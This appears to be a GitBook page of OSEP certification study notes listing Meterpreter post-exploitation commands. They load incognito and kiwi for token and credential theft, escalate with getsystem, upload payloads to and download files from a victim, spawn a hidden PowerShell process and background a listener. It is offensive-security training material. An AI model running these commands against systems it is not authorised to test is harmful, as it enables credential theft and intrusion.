OSEP Notes
  • Introduction
  • Useful Links, Tools & Tricks
  • OSEP
    • Metasploit Payload & Listener
      • Metasploit Useful Modules
      • Encoder
    • File Transfer & Execution
    • Phishing
    • Local Reconnaissance Windows
      • SQL Server Instance
      • Application Whitelisting & Credentials
    • Local Reconnaissance Linux
      • Ansible
    • Privilege Escalation
    • Pivoting
    • Pass the Hash
      • Remote Access
    • Post Exploitation
      • Add User
      • AMSI, CLM, & App Locker
    • Credentials
    • Lateral Movement
  • Active Directory
    • Domain Reconnaissance on Kali
    • Domain Reconnaissance on Windows
    • Active Directory Forest
Powered by GitBook
On this page
  • Metasploit Modules
  • spawn x64 process
  • Run listener in background
  1. OSEP
  2. Metasploit Payload & Listener

Metasploit Useful Modules

PreviousMetasploit Payload & ListenerNextEncoder

Last updated 1 year ago

Metasploit Modules

load incognito
load kiwi
getsystem
upload /path/in/hdd/payload.exe exploit.exe

download /path/in/victim

spawn x64 process

execute -i H -f powershell

Run listener in background

exploit -j
https://www.offsec.com/metasploit-unleashed/fun-incognito/